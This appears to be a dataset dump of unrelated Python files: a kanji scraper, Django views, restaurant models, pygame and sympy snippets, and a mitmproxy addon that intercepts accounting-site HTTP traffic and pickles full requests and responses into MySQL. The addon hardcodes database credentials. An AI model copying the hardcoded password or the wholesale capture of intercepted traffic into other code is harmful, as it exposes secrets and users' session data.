time.localtime(dtlong)\n\t\t\tddate = time.strftime('%Y-%m-%d', dt)\n\t\t\tdtime = time.strftime('%H:%M:%S', dt)\n\t\t\t#log.debug('inserting ' + self.table + ' : ' + str(val1))\n\t\t\t#log.info(data)\n\t\t\tcur.execute('INSERT INTO ' + self.table + ' VALUES(?,?,?,?,?,?,?,?,?,?,?)', (dtlong,ddate,dtime,val1,val2,val3,val4,val5,val6,val7,val8))\n\t\telse:\n\t\t\tlog.info('** data duplicate ** ' + self.table + ' : ')\n\t\t\tlog.info(data)\n\t\t#self.conn.commit()\n\t\tcur.close()\n\t\treturn\n\t\t\n\t\t\n\tdef getPrice(self, ptype, qtime):\n\t\tcur = self.conn.cursor()\n\t\t#print cur.execute('select * from FEDATA').fetchall()\n\t\tcur.execute('SELECT DVALUE,DPER,DOPEN,DTIME FROM FEDATA WHERE DTYPE=? AND DTLONG<=? ORDER BY DTLONG DESC', (ptype, qtime))\n\t\tval = cur.fetchone()\n\t\tif val:\n\t\t\treturn val\n\t\telse:\n\t\t\treturn None\n\t\t\n\n\tdef initTables(self):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD1\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD5\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD15\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD30\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD60\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD240\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD1440\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD10080\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD43200\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.close()","sub_path":"trader/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"70460319","text":"import pygame\n\n\nclass Boost(pygame.sprite.Sprite):\n\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('Images/boost.png').convert()\n self.ColorKey = self.image.get_at((0, 0))\n self.image.set_colorkey(self.ColorKey)\n self.rect = self.image.get_rect()\n self.boost_mask = pygame.mask.from_surface(self.image)\n","sub_path":"Boost.py","file_name":"Boost.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"34554600","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis code will take the kanji list\r\n\"\"\"\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\n\r\ndef read_ex(reading,kun_or_on,soup):\r\n '''reading is the list of kun or on readings.\r\n soup is the BeautifulSoup object of the webpage for the character.\r\n kun_or_on is 1 for kun and 0 for on if they both exist. If only one exists,\r\n then it is 0.'''\r\n dict_defn = {}\r\n count=0\r\n for j in reading:\r\n count=count+1\r\n if (j[0] != '-') & (j[-1] != '-'):\r\n lst_ex = re.findall('【(.*)】', soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())\r\n for k in lst_ex:\r\n if j in k:\r\n start_ex = '\\n 【' + k + '】\\n '\r\n end_ex = '\\n\\n'\r\n ex = start_ex + '(.*)' + end_ex\r\n defn = re.findall(ex, soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())[0]\r\n ex2 = '\\n\\n '+'(.*)'+start_ex\r\n read = re.findall(ex2, soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())[0]\r\n dict_defn[reading[count-1]] = read+' '+defn\r\n break\r\n return dict_defn\r\n\r\nfile = open(r\"kanji_by_frequency.txt\",encoding='utf8',mode='r').read()\r\nkanji_by_freq = file.split('\\n')\r\nlist_couple = [list(x.split(': ')) for x in kanji_by_freq]\r\nlist_couple.pop(2501) # The last element is an empty string so pop it\r\n# Convert the number kanji pair to tuples in a list. The number means usage rank in newspapers\r\ntuple_couple = [(int(y[0]),y[1]) for y in list_couple]\r\nkanji_freq = dict(tuple_couple) # Create a dictionary from the tuple pairs\r\nfinal_dict = {}\r\n# Scrape the information off of jisho.org\r\nfor i in range(1,len(kanji_freq)+1):\r\n result = requests.get('https://jisho.org/search/' + kanji_freq[i] + '%23kanji')\r\n c = result.content\r\n soup = BeautifulSoup(c)\r\n # Defines the main meaning of the kanji\r\n main_meaning = soup.find('div',class_=\"kanji-details__main-meanings\").get_text()[7:-5]\r\n if len(soup.find_all('dd', class_=\"kanji-details__main-readings-list\")) == 2:\r\n # Splits readings and defines as a list\r\n kun_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n on_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[1].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==2:\r\n kun_reading_ex = read_ex(kun_reading,1,soup)\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n elif len(soup.find_all('ul', class_='no-bullet'))==1:\r\n if soup.find_all('h2')[0:2] == 'On':\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n kun_reading_ex = []\r\n else:\r\n kun_reading_ex = read_ex(kun_reading,0,soup)\r\n on_reading_ex=[]\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n elif soup.find_all('dt')[2].get_text()=='Kun:':\r\n kun_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==1:\r\n kun_reading_ex = read_ex(kun_reading,0,soup)\r\n on_reading_ex=[]\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n elif soup.find_all('dt')[2].get_text()=='On:':\r\n on_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==1:\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n kun_reading_ex = []\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n final_dict[i] =[main_meaning,kun_reading,kun_reading_ex,on_reading,on_reading_ex]\r\n# The final dictionary was saved as a pickle object\r\nkanji_info = final_dict\r\n","sub_path":"top_kanji.py","file_name":"top_kanji.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601381299","text":"# -*- coding: utf-8 -*-\n\"\"\"\nShowtitle - Links\n\"\"\"\nserieslinks = {'The Big Bang Theory' : 'the-big-bang-theory',\n 'The-Simpsons' : 'die-simpsons',\n 'Marvel-s-Agents-of-S-H-I-E-L-D':'the-agents-of-s-h-i-e-l-d',\n 'Fringe':'fringe-grenzfaelle-des-fbi',\n\t\t\t 'The-Vampire-Diaries':'Vampire-Diaries'} \n #to be continued...\n\nsenderlist = {'pro7' : 'ProSieben', 'rtlnitro' : 'rtl-nitro',\n 'pro7max' : 'ProSiebenMaxx', 'rtl':'rtl', 'vox':'vox',\n 'rtl2':'rtl2'}\n","sub_path":"fernsehserien_de_links.py","file_name":"fernsehserien_de_links.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6120222","text":"#coding: utf-8\nfrom django.shortcuts import render\nfrom dbcontrol import DBcontrolLer\nfrom django.http import JsonResponse\nimport json\nfrom django.shortcuts import render_to_response\n# Create your views here.\ndef index(request):\n controller = DBcontrolLer()\n orderList = controller.getShopList()\n return render(request,'index.html')\n\ndef getOrderList(request):\n # controller = DBcontrolLer()\n # orderList = controller.getOrderList()\n orderList = [{\"username\":\"Li\"},{\"username\":\"Chen\"}]\n if len(orderList) > 0:\n return render_to_response('orderList.html', {\"orderList\":orderList})\n else:return \"\"\n\ndef getShopInfo(request):\n #shopInfo = [{\"shopname\":\"shop1\",\"discount\":\"discount\",\"baseprice\":\"baseprice\",\"dishes\":[{\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish2\",\"price\":\"price2\"}]}]\n controller = DBcontrolLer()\n shopInfo = controller.getShopList()\n if len(shopInfo)>0:\n return render_to_response('shopList_module.html',{\"shopInfo\":shopInfo})\n else:return \"\"\n\ndef submitOrder(request):\n order = json.loads(request.body)\n controller = DBcontrolLer()\n controller.submitOrder(order['orders'])\n #print order['orders'][0]['username']\n return JsonResponse({'1':1})\n\ndef login(request):\n if request.POST:\n others = list(set(['Li','Chen','Yu'])-set([request.POST['optionsRadios']]))\n controller = DBcontrolLer()\n orderList = controller.getOrderList()\n '''\n orderList = [\n {\"username\":\"Li\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish11\",\"price\":\"price1\"},{\"dishname\":\"dish12\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish11\",\"price\":\"price1\"},{\"dishname\":\"dish12\",\"price\":\"price1\"}]}\n ]\n },\n {\"username\":\"Chen\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]}\n ]\n },\n {\"username\":\"Yu\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]}\n ]\n }]\n '''\n return render_to_response(\"home_module.html\",{'name':request.POST['optionsRadios'],'others':others,'orderList':orderList})","sub_path":"fdapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"143327241","text":"from djongo import models\nfrom bson import ObjectId\nfrom restaurant.cuisine_dict import load_dict\nfrom restaurant.enum import Prices, Categories\nfrom django.core.exceptions import ObjectDoesNotExist\nimport requests\nfrom utils.model_util import save_and_clean, update_model_geo, model_refresh\nfrom geo.geo_controller import geocode\n\nFOOD_PICTURE = 'https://storage.googleapis.com/default-assets/no-image.png'\n\nRESTAURANT_COVER = 'https://storage.googleapis.com/default-assets/cover.jpg'\nRESTAURANT_LOGO = 'https://storage.googleapis.com/default-assets/logo.jpg'\nDISHES = 'dishes.csv'\n\n\nclass Food(models.Model):\n \"\"\" Model for the Food Items on the Menu \"\"\"\n _id = models.ObjectIdField()\n name = models.CharField(max_length=50, default='')\n restaurant_id = models.CharField(max_length=24)\n description = models.CharField(max_length=200, blank=True, default='')\n picture = models.CharField(max_length=200, blank=True,\n default=FOOD_PICTURE)\n price = models.DecimalField(max_digits=6, decimal_places=2)\n tags = models.ListField(default=[], blank=True)\n specials = models.CharField(max_length=51, blank=True)\n category = models.CharField(max_length=50, blank=True, default='')\n\n class Meta:\n unique_together = ((\"name\", \"restaurant_id\"),)\n\n def is_tagged(self, tag):\n \"\"\"\n check if food is tagged with tag 'tag'\n @param tag: referenced tag\n @return: boolean\n \"\"\"\n return tag._id in self.tags\n\n @classmethod\n def add_dish(cls, food_data):\n \"\"\"\n insert dish into database and return response\n :param food_data: dictionary representation of dish\n :return: Food model object\n \"\"\"\n dish = cls(\n name=food_data['name'],\n restaurant_id=food_data['restaurant_id'],\n description=food_data['description'],\n price=food_data['price'],\n specials=food_data['specials'],\n category=food_data['category'],\n )\n save_and_clean(dish)\n dish = model_refresh(Food, {'name': dish.name, 'restaurant_id': dish.restaurant_id})\n restaurant = Restaurant.objects.get(_id=food_data['restaurant_id'])\n if not restaurant.category_exists(food_data['category']):\n restaurant.categories.append(food_data['category'])\n restaurant.save(update_fields=['categories'])\n return dish\n\n\n\n @classmethod\n def get_by_restaurant(cls, rest_id):\n \"\"\"\n Retrieve restaurant by id\n :param rest_id: id of restaurant\n :return: restaurant data in json\n \"\"\"\n return list(Food.objects.filter(restaurant_id=rest_id))\n\n @classmethod\n def field_validate(self, fields):\n \"\"\"\n Validates fields\n :param fields: Dictionary of fields to validate\n :return: A list of fields that were invalid. Returns None if all fields are valid\n \"\"\"\n dish_urls = ['picture']\n invalid = {'Invalid': []}\n\n for field in dish_urls:\n if field in fields and fields[field] != '':\n try:\n requests.get(fields[field])\n except (requests.ConnectionError, requests.exceptions.MissingSchema):\n invalid['Invalid'].append(field)\n\n if not invalid['Invalid']:\n return None\n else:\n return invalid\n\n def clean_description(self):\n description = {food for food in self.description.split(' ')}\n clean_description = set()\n for word in description: # clean word, remove non alphabetical\n clean_description.add(''.join(e for e in word if e.isalpha()))\n clean_description = set(map(str.lower, clean_description))\n return clean_description\n\n\nclass ManualTag(models.Model):\n \"\"\" Model for Manual Tags \"\"\"\n _id = models.ObjectIdField()\n category = models.CharField(max_length=4, choices=Categories.choices())\n value = models.CharField(max_length=50)\n foods = models.ListField(default=[], blank=True)\n\n @classmethod\n def clear_food_tags(cls, food_name, restaurant_id):\n \"\"\"\n Destroy all food-tag relationships for food\n :param food_name: name of food\n :param restaurant: id of restaurant\n :return: None\n \"\"\"\n food = Food.objects.get(name=food_name,\n restaurant_id=restaurant_id)\n for tag_id in food.tags:\n tag = ManualTag.objects.get(_id=tag_id)\n tag.remove_food(food._id)\n food.tags = []\n food.save()\n\n def remove_food(self, food_id):\n \"\"\"\n remove food_id from tag\n @param food_id: referenced food_id\n \"\"\"\n self.foods.remove(food_id)\n self.save()\n\n @classmethod\n def add_tag(cls, food_name, restaurant_id, category, value):\n \"\"\"\n Add tag to food\n :param food_name: name of food\n :param restaurant_id: id of restaurant\n :param category: category of following tag\n :param value: value of following tag\n :return: following tag object\n \"\"\"\n food = Food.objects.get(name=food_name,\n restaurant_id=restaurant_id)\n if not ManualTag.tag_exists(value, category):\n tag = cls(value=value, category=category, foods=[food._id])\n save_and_clean(tag)\n return tag\n\n tag = ManualTag.objects.get(value=value, category=category)\n if not food.is_tagged(tag):\n add_new_tag(food, tag)\n return tag\n\n @classmethod\n def tag_exists(cls, value, category):\n return cls.objects.filter(value=value, category=category).exists()\n\n @classmethod\n def auto_tag_food(cls, _id):\n \"\"\"\n generate tags based on food description\n :param _id: id of food\n :return: list of generated tags\n \"\"\"\n dish = Food.objects.get(_id=ObjectId(_id))\n clean_description = dish.clean_description()\n cuisine_dict = load_dict.read(DISHES)\n keywords = clean_description.intersection(cuisine_dict)\n tags = ManualTag().tag_description(keywords, dish)\n return tags\n\n def __eq__(self, other):\n return self.food == other.food and self.category == other.category and self.value == other.value\n\n\n @classmethod\n def tag_description(cls, keywords, dish):\n tags = []\n for keyword in keywords:\n tags.append(cls.add_tag(dish.name, dish.restaurant_id, Categories.DI.name, keyword))\n return tags\n\n\ndef add_new_tag(food, tag):\n \"\"\"\n add new tag-food relationship\n @param food: food model\n @param tag: tag model\n \"\"\"\n food.tags.append(tag._id)\n tag.foods.append(food._id)\n tag.save()\n food.save()\n\n\nclass Restaurant(models.Model):\n \"\"\" Model for Restaurants \"\"\"\n _id = models.ObjectIdField()\n name = models.CharField(max_length=30)\n address = models.CharField(max_length=60)\n phone = models.BigIntegerField(null=True)\n email = models.EmailField(unique=True)\n city = models.CharField(max_length=40)\n cuisine = models.CharField(max_length=30)\n pricepoint = models.CharField(max_length=10, choices=Prices.choices())\n twitter = models.CharField(max_length=200, blank=True)\n instagram = models.CharField(max_length=200, blank=True)\n bio = models.TextField(null=True)\n GEO_location = models.CharField(max_length=200)\n external_delivery_link = models.CharField(max_length=200, blank=True)\n cover_photo_url = models.CharField(max_length=200,\n default='https://storage.googleapis.com/default-assets/cover.jpg')\n logo_url = models.CharField(max_length=200,\n default='https://storage.googleapis.com/default-assets/logo.jpg')\n rating = models.DecimalField(max_digits=3, decimal_places=2, default=0.00)\n owner_name = models.CharField(max_length=50, blank=True)\n owner_story = models.CharField(max_length=3000, blank=True)\n owner_picture_url = models.CharField(max_length=200, blank=True)\n categories = models.ListField(default=[], blank=True)\n\n def category_exists(self, category):\n \"\"\"\n Check whether category is new\n @param category: referenced category\n @return: boolean\n \"\"\"\n return category in self.categories\n\n @classmethod\n def get(cls, _id):\n \"\"\"\n retrieve restaurant based on id\n :param _id: id of restaurant\n :return: restaurant json or None\n \"\"\"\n try:\n restaurant = Restaurant.objects.get(_id=_id)\n return restaurant\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def insert(cls, restaurant_data):\n \"\"\"\n Insert restaurant into database given restaurant data\n :param restaurant_data: json data of restaurant\n :return: restaurant object representing sent data\n \"\"\"\n try:\n cls.objects.get(email=restaurant_data['email'])\n raise ValueError('Cannot insert')\n except ObjectDoesNotExist:\n restaurant = cls(\n **restaurant_data\n )\n update_model_geo(restaurant, restaurant_data['address'])\n restaurant = save_and_clean(restaurant)\n return restaurant\n\n @classmethod\n def field_validate(self, fields):\n \"\"\"\n Validates fields\n :param fields: Dictionary of fields to validate\n :return: A list of fields that were invalid. Returns None if all fields are valid\n \"\"\"\n restaurant_urls = ['twitter', 'instagram', 'cover_photo_url', 'logo_url', 'owner_picture_url',\n 'external_delivery_link']\n\n invalid = {'Invalid': []}\n\n for field in restaurant_urls:\n if field in fields and fields[field] != '':\n try:\n requests.get(fields[field])\n except (requests.ConnectionError, requests.exceptions.MissingSchema):\n invalid['Invalid'].append(field)\n\n if 'phone' in fields and fields['phone'] is not None:\n if len(str(fields['phone'])) != 10:\n invalid['Invalid'].append('phone')\n if 'address' in fields:\n try:\n geocode(fields['address'])\n except ValueError:\n invalid['Invalid'].append('address')\n if len(invalid['Invalid']) == 0:\n return None\n else:\n return invalid\n","sub_path":"server/restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"278789910","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\n########################################\r\nfrom sqlalchemy import create_engine, Column, Integer, String, LargeBinary,Boolean\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nSURL = \"mysql+pymysql://cic_admin:TaBoq,,1234@192.168.1.170:3306/cicjust_splinter?charset=utf8&autocommit=true\"\r\nengine = create_engine(SURL) # 定义引擎\r\nBase = declarative_base() # 基类,表都继承这个类\r\nsession = sessionmaker(engine)() # 操作数据库,数据库对话\r\n\r\nclass JCDFLOWSAVE(Base):\r\n __tablename__ = 'jcdflowsave'\r\n id = Column(Integer, primary_key=True)\r\n now_time = Column(String(40))\r\n request = Column(LargeBinary())\r\n response = Column(LargeBinary())\r\n path = Column(String(100))\r\n status = Column(Boolean)\r\n\r\n# Base.metadata.drop_all(engine)\r\n# Base.metadata.create_all(engine) # 创建所有Base派生类所对应的数据表。\r\n\r\n########################################\r\n'''子进程队列通信'''\r\nfrom multiprocessing import Process, Queue\r\nq = Queue()\r\n\r\ndef write_queue(q,dicts):\r\n q.put(dicts)\r\n\r\ndef read_queue(q):\r\n while True:\r\n dicts = q.get(True)\r\n request = dicts['request']\r\n response = dicts['response']\r\n now_time = dicts['now_time']\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',\r\n status=False) # 创建对象,即表中一条记录\r\n session.add(result) # 对象存入数据库\r\n session.commit() # 所有的数据处理准备好之后,执行commit才会提交到数据库\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # 加入数据库commit提交失败,回滚\r\n res = pickle.loads(response) # 从字节对象中读取被封装的对象\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # 将数据通过特殊的形式转换为只有python语言认识的字符串,并写入文件\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path, status=False)\r\n session.add(result)\r\n session.commit()\r\n########################################\r\n'''进程池异步调用'''\r\nfrom multiprocessing import Pool\r\npool = Pool()\r\n# pool.close()\r\n# pool.join()\r\n########################################\r\n'''线程装饰器异步调用'''\r\nfrom threading import Thread # thread开启一个新的线程去执行参数fn。\r\n# from threading import Lock\r\n# lock=Lock()\r\n# lock.acquire()\r\n# '''share data'''\r\n# lock.release()\r\nimport threading\r\nimport os\r\ndef async_call(fn):\r\n def wrapper(*args, **kwargs):\r\n #通过target关键字参数指定线程函数fun\r\n thr = Thread(target=fn, args=args, kwargs=kwargs) # 表示控制线程的类。\r\n # print(thr.isDaemon()) # False\r\n # thr.setDaemon(True)\r\n '''如果是后台线程,主线程执行过程中,后台线程也在进行,主线程执行完毕后,后台线程不论成功与否,主线程和后台线程均停止\r\n 如果是前台线程,主线程执行过程中,前台线程也在进行,主线程执行完毕后,等待前台线程也执行完成后,程序停止'''\r\n thr.start()\r\n # print(thr.is_alive()) # True\r\n # thr.join() # 0.10622406005859375 阻塞当前上下文环境的线程,直到调用此方法的线程终止或到达指定的\r\n return wrapper\r\n\r\n@async_call\r\ndef thread_save_data(request, response, now_time):\r\n '''存flow数据'''\r\n # print(threading.current_thread().name) # Thread-8\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',status=False) # 创建对象,即表中一条记录\r\n session.add(result) # 对象存入数据库\r\n session.commit() # 所有的数据处理准备好之后,执行commit才会提交到数据库\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # 加入数据库commit提交失败,回滚\r\n res = pickle.loads(response) # 从字节对象中读取被封装的对象\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # 将数据通过特殊的形式转换为只有python语言认识的字符串,并写入文件\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path,status=False)\r\n session.add(result)\r\n session.commit()\r\n########################################\r\n\r\nimport pickle\r\nimport time\r\n\r\n# 中间人\r\nimport mitmproxy.addonmanager\r\nimport mitmproxy.connections\r\nimport mitmproxy.http\r\nimport mitmproxy.log\r\nimport mitmproxy.proxy.protocol\r\nimport mitmproxy.tcp\r\nimport mitmproxy.websocket\r\n\r\ndef save_data(request, response, now_time):\r\n '''存flow数据'''\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',status=False) # 创建对象,即表中一条记录\r\n session.add(result) # 对象存入数据库\r\n session.commit() # 所有的数据处理准备好之后,执行commit才会提交到数据库\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # 加入数据库commit提交失败,回滚\r\n res = pickle.loads(response) # 从字节对象中读取被封装的对象\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # 将数据通过特殊的形式转换为只有python语言认识的字符串,并写入文件\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path,status=False)\r\n session.add(result)\r\n session.commit()\r\n\r\nlinks = ['portal/initPortal',\r\n 'edf/org/queryAll',\r\n '/ba/bankAccount/queryList',\r\n '/v1/gl/docManage/query',\r\n '/ba/inventory/queryList',\r\n '/ba/supplier/queryList',\r\n '/account/query',\r\n '/customer/queryList',\r\n '/v1/ba/person/queryList',\r\n '/balancesumrpt/query',\r\n '/balanceauxrpt/query',\r\n 'myip.ipip']\r\n\r\nclass Proxy():\r\n\r\n def request(self, flow: mitmproxy.http.HTTPFlow):\r\n '''拦截请求数据'''\r\n # print('request-start######################')\r\n # print(os.getpid()) # 25401\r\n # print(os.getppid()) # 19687\r\n # print('request-end######################')\r\n # print(threading.current_thread().name) # MainThread\r\n # print(threading.current_thread().getName()) # MainThread\r\n # print(threading.current_thread().is_alive()) # True\r\n # print(threading.current_thread().isDaemon()) # False\r\n\r\n def response(self, flow: mitmproxy.http.HTTPFlow):\r\n '''拦截响应数据'''\r\n # print('request-start######################')\r\n # print(os.getpid()) # 25401\r\n # print(os.getppid()) # 19687\r\n # print('request-end######################')\r\n # print(threading.current_thread().name)\r\n # print(threading.current_thread().getName())\r\n # print(threading.current_thread().is_alive())\r\n # print(threading.current_thread().isDaemon())\r\n for l in links:\r\n if '/account/queryCalcUsage' in flow.request.url: # 解决/account/query、/account/queryCalcUsage 相似问题\r\n pass\r\n elif l in flow.request.url:\r\n request = pickle.dumps(flow.request)\r\n response = pickle.dumps(flow.response)\r\n now_time = time.strftime('%Y_%m_%d_%H:%M:%S', time.localtime(time.time())) # 2019_12_25_10:12:10 str\r\n\r\n # start_time = time.time()\r\n\r\n # save_data(request, response, now_time) # 0.07043313980102539\r\n\r\n thread_save_data(request, response, now_time) # 0.0054090023040771484\r\n\r\n # res = pool.apply_async(save_data, args=(request,response,now_time)) # 0.0003180503845214844\r\n # pool.close() # 结束进程池接收任务\r\n # pool.join() # 感知进程池中的任务已经执行结束\r\n # print(res.get()) # 等待进程池内任务都处理完,然后可以用get收集结果。 代理必须结束才行。数据库没数据\r\n\r\n # dicts = {'request':request,'response':response,'now_time':now_time}\r\n # Process(target=write_queue, args=(q, dicts)).start()\r\n # Process(target=write_queue, args=(q, dicts)).join() # 用不起来,代理不是一个函数的方式启动。\r\n\r\n # end_time = time.time()\r\n # print('run time: {}'.format(end_time - start_time))\r\n break\r\n\r\naddons = [Proxy()]\r\n########################################\r\nif __name__ == '__main__':\r\n pass\r\n # Base.metadata.drop_all(engine)\r\n # Base.metadata.create_all(engine) # 创建所有Base派生类所对应的数据表。\r\n","sub_path":"proxy/proxy_v1.py","file_name":"proxy_v1.py","file_ext":"py","file_size_in_byte":9105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"451712359","text":"from sympy import *\nfrom sympy.galgebra.ga import *\n\ndef is_near_equal(v1, v2):\n \"\"\" A function which takes two sympy multivector arguments\n and compares them making sure that they are within\n the specified tolerance.\n \"\"\"\n if (v1|v2 <= 0.001): # if equal, dot product = 0\n return True\n else:\n return False\n \n \ndef is_near_zero(v1):\n \"\"\" A function which takes a scalar argument\n and verifies that its magnitude is sufficiently small.\n \"\"\"\n if abs(v1) <= 0.001:\n return True\n else:\n return False\n \n\ndef are_near_same(set):\n \"\"\" A function which compares a set of objects.\n They must all be of the same type and there\n values must be individually in range.\n \"\"\"\n result = True\n i = 1\n for v in set:\n for s in set:\n result = is_near_equal(v,s)\n if not result: return result # not near same - result false\n return result","sub_path":"src/main/python/isis/geom/model/tolerance.py","file_name":"tolerance.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"249875298","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom 